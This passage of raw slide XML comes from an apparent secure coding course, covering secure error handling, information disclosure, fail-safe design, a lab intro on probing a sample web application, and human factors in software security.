              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6496D163-9416-43B1-9E0B-1E8BD994176B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1143000"/>
            <a:ext cx="8460150" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exception handlers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Place code that might throw an exception in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> block and code that handles exceptions in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> block.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>(The mechanism for doing this varies from one language to another.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Use the most specific exception for the code you're writing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Avoid catching a fundamental exception type and handling all exception types in a generic way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>If you're using a language that supports a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>finally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> code block that is always called (whether an exception is thrown or not), then use it to return resources to the state they were in before the try block was executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Examples: Release connections to database/services, delete temporary files, release temporary data structures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Check return codes and respond appropriately when making calls to the operating system, libraries, services, and APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Avoid using functions that fail silently, and find safer alternative functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>If pass/fail return code not provided, check the return value to determine how to proceed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Safe to perform further calculations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Some other remediation is necessary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6BECB2-FAF0-4225-97F7-FA2E8297BA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Secure Error Handling (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D24AC614-9AF9-4172-86D5-506514F2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95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3DBC0-73C4-4066-8E97-26C73CF01EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6496D163-9416-43B1-9E0B-1E8BD994176B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1143000"/>
            <a:ext cx="8460150" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Respond to failures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Due to an expected reason</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Provide code to recover appropriately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Due to an unexpected reason or a reason the program can't recover from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Log the unexpected value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Cleanly terminate (break sessions, delete temporary files, destroy other resources an attacker might use).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heed compiler warnings about missing error handlers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not simply bypass the warning (by adding an empty or do-nothing error handler </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to squelch warnings).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where success or failure represents a security event (e.g., unsuccessful login):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Add secure logging.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Provide notifications to system operators for security-related events.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6BECB2-FAF0-4225-97F7-FA2E8297BA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Secure Error Handling (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D24AC614-9AF9-4172-86D5-506514F2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16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3DBC0-73C4-4066-8E97-26C73CF01EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6496D163-9416-43B1-9E0B-1E8BD994176B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable logging in release builds of your software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure release builds to not provide core dumps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure all components, libraries, and other third-party code are configured to provide no error messages or logs that will be useful to an attacker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6BECB2-FAF0-4225-97F7-FA2E8297BA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Information Disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEEB60DC-9041-4A0E-BAD9-E7803E804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900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3DBC0-73C4-4066-8E97-26C73CF01EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6496D163-9416-43B1-9E0B-1E8BD994176B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Denies access by default in error-handling logic for security controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put limits on recovery retry attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn't make assumptions about ways to remediate when failure occurs. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6BECB2-FAF0-4225-97F7-FA2E8297BA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Fail-Safe Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B315F561-7FDA-4CCB-B846-3901539B5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660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870AFF-0019-40CF-B7C3-5184C642C173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D079A1E-A10C-4BFA-B32A-141E6F95EB80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You have:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performed some footprinting of the Woodworker's Wheelhouse web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determined various technologies that it uses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examined how the application is generally set up and configured, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now you will try out some simple attack patterns to see where the application might have problems due to defects and misconfiguration.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF0928E-844F-47D9-B575-C1D18348C21F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Identifying Software Defects and Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{243AA97F-620C-4791-BCCA-75AB615C1CCE}"/>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6"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463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A53419-71E0-4D1D-BE98-295D56CD4968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</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54918EDD-065D-4E72-AE2A-6FE99B4DDBE3}"/>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3402D3D4-BB02-4544-81FF-5B48E2F7DBA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handle Vulnerabilities Due to Human Factors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63544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F49EDA-4581-4C98-AACC-5BC93EFC918D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9182262D-EE3E-485D-8A1D-5C4BCDFB70A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>US-CERT: “Human behavior will introduce vulnerabilities into your system.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security vulnerabilities may be caused by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious, disaffected, or careless end users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well-intentioned users who are confused or uninformed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a developer, it is helpful to be able to consider how an end user will behave.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can't completely control user behavior. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, you can take steps to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine what users can and can't do in your application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inform and educate users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor and report bad behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit potential damage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify vulnerabilities imposed by the human element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use risk management strategies to formulate a plan for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dealing with them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E308C3A-4E3F-48F9-850F-34A5BFC1C5CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Human Element in Software Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for crash dummy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304" y="3487992"/>
            <a:ext cx="2934384" cy="293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229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0123F2-42A5-4EAA-BD32-A83C32A0E2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411EDE7A-B868-4393-8C5C-DEE8BA9284FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1143000"/>
            <a:ext cx="8460150" cy="5302470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using passwords that are easily broken by an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Providing credentials or access to an attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Posting them in unsecure locations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leaving logged-in devices unattended.</a:t>
            </a:r>
          </a:p>
